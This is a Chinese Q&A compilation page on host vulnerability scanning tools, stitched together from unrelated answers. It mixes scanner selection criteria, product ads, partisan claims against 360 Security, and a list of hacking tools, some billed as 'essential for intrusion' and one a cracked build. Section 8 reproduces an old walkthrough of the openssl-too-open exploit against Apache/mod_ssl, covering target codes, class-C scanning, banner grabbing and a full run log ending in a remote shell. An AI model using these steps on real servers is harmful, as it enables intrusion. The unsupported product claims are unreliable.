主机漏洞扫描工具

1、漏洞扫描工具

金山卫士是最好用的漏洞扫描工具，我不骗你真的超好用，漏洞修复的技术也是超棒的，比别看他没宣传，其实它的功能还是相当可以的，对于企业业务的人士也是电脑必备的软件哦，你别看大多数的电脑里都装了360安全卫士，其实360安全卫士一点也不好，它只是被大规模的宣传过，其实真的不好，不然电脑中安装360的用户怎么都说不好，杀毒的效果也不好，扫描漏洞的功能更差，这就是360的虚假信息，我现在回答主题，金山卫士好，我现在没在宣传，真的很好用，采纳不采纳我的回答你自己决定。

2、如何选择安全漏洞扫描工具

2 隐患扫描工具的衡量因素 决定是否采用隐患扫描工具来防范系统入侵是重要的第一步.当您迈出了这一步后,接下来的是：如何选择满足您公司需要的合适的隐患扫描技术,这同样也很重要.以下列出了一系列衡量因素：① 底层技术（比如,是被动扫描还是主动扫描,是基于主机扫描还是基于网络扫描）； ② 特性； ③ 漏洞库中的漏洞数量； ④ 易用性； ⑤ 生成的报告的特性（内容是否全面、是否可配置、是否可定制、报告的格式、输出方式等）； ⑥ 对于漏洞修复行为的分析和建议（是否只报告存在哪些问题、是否会告诉您应该如何修补这些漏洞）； ⑦ 安全性（由于有些扫描工具不仅仅只是发现漏洞,而且还进一步自动利用这些漏洞,扫描工具自身是否会带来安全风险）； ⑧ 性能； ⑨ 价格结构 2.1 底层技术 比较漏洞扫描工具,第一是比较其底层技术.你需要的是主动扫描,还是被动扫描；是基于主机的扫描,还是基于网络的扫描,等等.一些扫描工具是基于Internet的,用来管理和集合的服务器程序,是运行在软件供应商的服务器上,而不是在客户自己的机器上.这种方式的优点在于检测方式能够保证经常更新,缺点在于需要依赖软件供应商的服务器来完成扫描工作.扫描古城可以分为"被动"和"主动"两大类.被动扫描不会产生网络流量包,不会导致目标系统崩溃,被动扫描工具对正常的网络流量进行分析,可以设计成"永远在线"检测的方式.与主动扫描工具相比,被动扫描工具的工作方式,与网络监控器或IDS类似.主动扫描工具更多地带有"入侵"的意图,可能会影响网络和目标系统的正常操作.他们并不是持续不断运行的,通常是隔一段时间检测一次.基于主机的扫描工具需要在每台主机上安装代理（Agent）软件；而基于网络的扫描工具则不需要.

3、常用的漏洞扫描软件有哪些其功能是什么

采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测，支持插件功能，提供了图形界面和命令行两种操作方式，扫描内容包括：远程操作系统类型及版本，标准端口状态及端口BANNER信息，CGI漏洞，IIS漏洞，RPC漏洞，SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用户，NT服务器NETBIOS信息等。扫描结果保存在/log/目录中，index_*.htm为扫描结果索引文件。

4、大神们 Linux服务器一般用什么的工具扫描漏

目前，市场上有很多漏洞扫描工具，按照不同的技术(基于网络的、基于主机的、基于代理的、C/S的)、不同的特征、不同的报告方法，以及不同的监听模式，可以分成好几类。

不同的产品之间，漏洞检测的准确性差别较大，这就决定了生成的报告的有效性上也有很大区别。

选择正确的漏洞扫描工具，对于提高你的系统的安全性，非常重要。

本文除为读者说明如何正确选择一款合适的安全漏洞扫描工具，也会结合实际的安全产品——云鉴漏洞扫描云平台进行说明。

1、漏洞扫描概述

在字典中，Vulnerability意思是漏洞或者缺乏足够的防护。在军事术语中，这个词的意思更为明确，也更为严重------有受攻击的嫌疑。

每个系统都有漏洞，不论你在系统安全性上投入多少财力，攻击者仍然可以发现一些可利用的特征和配置缺陷。

这对于安全管理员来说，实在是个不利的消息。但是，多数的攻击者，通常做的是简单的事情。

发现一个已知的漏洞，远比发现一个未知漏洞要容易的多，这就意味着:多数攻击者所利用的都是常见的漏洞，这些漏洞，均有书面资料记载。

这样的话，采用适当的工具，就能在黑客利用这些常见漏洞之前，查出网络的薄弱之处。如何快速简便地发现这些漏洞，这个非常重要。

漏洞，大体上分为两大类:

① 软件编写错误造成的漏洞;

② 软件配置不当造成的漏洞。

漏洞扫描工具均能检测以上两种类型的漏洞。漏洞扫描工具已经出现好多年了，安全管理员在使用这些工具的同时，黑客们也在利用这些工具来发现各种类型的系统和网络的漏洞。

云鉴漏洞扫描云平台由北京安普诺信息技术有限公司（Anpro，简称安普诺）自主研发上线。

目前针对Linxu服务器中常规漏洞进行安全扫描，能够有效发现系统中存在的安全漏洞，除此之外，也为用户提供Andorid应用的漏洞扫描。

以此安全扫描平台为例，它适合于Linux操作系统，具体适合RedHat、CentOS系列的操作系统，所以需要对Linux操作系统进行扫描的就可以选择了。

2、漏洞扫描工具的衡量因素

决定是否采用漏洞扫描工具来防范系统入侵是重要的第一步。当您迈出了这一步后，接下来的是:如何选择满足您公司需要的合适的漏洞扫描技术，这同样也很重要。

以下列出了一系列衡量因素:

① 底层技术(比如，是被动扫描还是主动扫描，是基于主机扫描还是基于网络扫描);

② 特性;

③ 漏洞库中的漏洞数量;

④ 易用性;

⑤ 生成的报告的特性(内容是否全面、是否可配置、是否可定制、报告的格式、输出方式等);

⑥ 对于漏洞修复行为的分析和建议(是否只报告存在哪些问题、是否会告诉您应该如何修补这些漏洞);

⑦ 安全性(由于有些扫描工具不仅仅只是发现漏洞，而且还进一步自动利用这些漏洞，扫描工具自身是否会带来安全风险);

⑧ 性能;

⑨ 价格结构

云鉴采用基于主机的主动扫描，漏洞库中收集了常规系统、组件、应用、服务漏洞，除此之外实时更新最新漏洞进入漏洞库，采用C/S模式，用户只需要执行一条命令便能查看到报告。

按照服务器台数进行收费，出具的报告中包括对漏洞的分析和修复建议。

5、服务器主机漏洞扫描软件

SSS扫描之王，是俄罗斯的一个安全漏洞扫描软件，十分强大，具体的可以百度，免注册的

6、黑客漏洞扫描工具使用方法

扫描工具 Domain2.2 -集WHOIS查询、上传页面批量检测、木马上传、数据库浏览及加密解密于一体。 X-way 2.5 -不错的扫描器，功能多，使用也不难，入侵必备。 SuperScan 3.0 -强大的TCP 端口扫描器、Ping 和域名解析器。 Namp 3.5 -安全界人人皆知的非常有名气的一个扫描器，作者Fyodor。 Hscan v1.20 -运行在Win NT/2000下的漏洞扫描工具，有GUI以及命令行两种扫描方式。 SSS -俄罗斯安全界非常专业的一个安全漏洞扫描软件。 U-Scan.exe -非常好的UNICODE漏洞扫描工具。 RpcScan V1.1 -可以通过135端口枚举远程主机RPC连接信息。 SHED 1.01 -一个用来扫描共享漏洞的机器的工具。 DSScan V1.00 -ms04-011远程缓冲区溢出漏洞扫描专用。 Dotpot PortReady1.6 - “绿色软件，”无需安装，非常小巧（23KB），具有极快的扫描速度。 WebD***Scan v1.0 -针对WEBD***漏洞的扫描工具。 注意：该软件会被查杀！ Socks Proxy Finder2 -扫描端口速度非常快的一个工具，扫描完毕后还可以导出保存起来。 SQLScan v1.2 -猜解开着1433端口的主机密码工具。 RPC漏洞扫描器 v1.03 -针对RPC漏洞扫描的工具! 流光5.0 破解版 -国内有名的黑客扫描工具，由高级程序员小榕编写。 WIN2K自动攻击探测机 -Windows NT/2000 自动攻击探测机。 4899空口令探测 -能够快速的扫描到被安装了radmin服务端4899端口的空口令IP。注意：会被查杀！ 关键是你没说你用哪种啊 ~ 具体是哪款~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7、如何选择漏洞扫描工具

不错不错。。。学习了下

8、求可以扫描ip主机漏洞的软件，附带漏洞利用的更好，win7的

apache_openssl漏洞的利用及权限的提升
apache_openssl漏洞的利用及权限的提升

－－nightcat
转载请保持文章完整

第一部分：获得shell.

在packetstorm玩了一段时间，遇到有openssl-too-open.tar.gz这个exploit.
现在看看软件包的描述：
OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes advantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability analysis

这个描述说明这个exploit 是openssl v 0.9.6的key_arg的漏洞来达到溢出的目的。不过也要
注意apache/mod_ssl的版本信息。对于大多数的有这样条件的都能溢出成功。取得一个id是
nobody shell,有些甚至是root的权限。软件包里面有一个扫描器,exploit。

好象听起来很诱人，down回来研究一下。
nightcat@nightcat$tar -zxvf openssl-too-open.tar.gz
nightcat@nightcat$cd openssl-too-open
Makefile README linux-x86.c main.c main.h scanner.c ssl2.c ssl2.h

习惯性的要读一下软件包的REAMDE文件。
nightcat@nightcat$ more README
得到一些有用的信息：
1.编译的方法：
直接make就可以，之后就可以得到openssl-too-open和openssl-scanner

2.openssl-too-open的用法：
Usage: ./openssl-too-open [options] <host>
-a <arch> target architecture (default is 0x00)
-p <port> SSL port (default is 443)
-c <N> open N apache connections before sending the shellcode (default is 30)
-m <N> maximum number of open connections (default is 50)
-v verbose mode

Supported architectures:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (apache-1.3.19)
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)

/****想成功，就要看准系统类型　和apache版本号
*****如果是 0x07 - RedHat Linux 7.0 (apache-1.3.12-25)：
*****./epenssl-too-open -a 0x07 ip .就应该可以啦！
****/

3.openssl-scanner的用法：
Usage: ./openssl-scanner [options] <host>
-i <inputfile> file with target hosts
-o <outputfile> output log
-a append to output log (requires -o)
-b check for big endian servers
-C scan the entire class C network the host belogs to
-d debug mode
-w N connection timeout in seconds

Examples: ./openssl-scanner -d 192.168.0.1
./openssl-scanner -i hosts -o my.log -w 5
./openssl-scanner -C 192.168.0.0

/****扫描一个c类的ip
*****./openssl-scanner -C 192.168.0.0
****/

4.一个实现例子：

$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <[email protected]>

Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done

192.168.0.136: Vulnerable

$ nc 192.168.0.1 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html

./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <[email protected]>

: Opening 30 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x810b3a0
ssl1 : 0x810b360
ssl2 : 0x810b4e0

* Addresses don't match.

: Opening 40 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x80fd668
ssl2 : 0x80fd668

* Addresses don't match.

: Opening 50 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x8103830
ssl2 : 0x8103830

: Sending shellcode
ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184
Reading tag
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...

bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.05$

整个README 文件已经说的很明白了：
现在是总结一下实现的过程：
1.通过openssl-scanner来扫描一个c段的ip，找到有漏洞的主机，
2.用nc的方法查找banner得到三个目标内容：apache的版本号，openssl的版本号，操作系统版本3.在通过openssl-too-open来进行溢出得到一个shell.

9、局域网主机安全漏洞扫描工具

360免费软件就可以扫局域网主机的，去360官网上下吧。
机漏洞扫描器（Host Scanner）也可以进行主机漏洞扫描，需要你设置主机的IP 端口 然后根据返回信息来判断

10、云服务器系统漏洞扫描用什么软件？

云帮手这款工具软件。
不仅仅是云主机扫描系统漏洞的需要，而且还满足了云主机系统修复和后续的拓展需要。这款软件就叫云帮手，值得一提的同类软件有不少是付费版的，但是这款软件是免费的。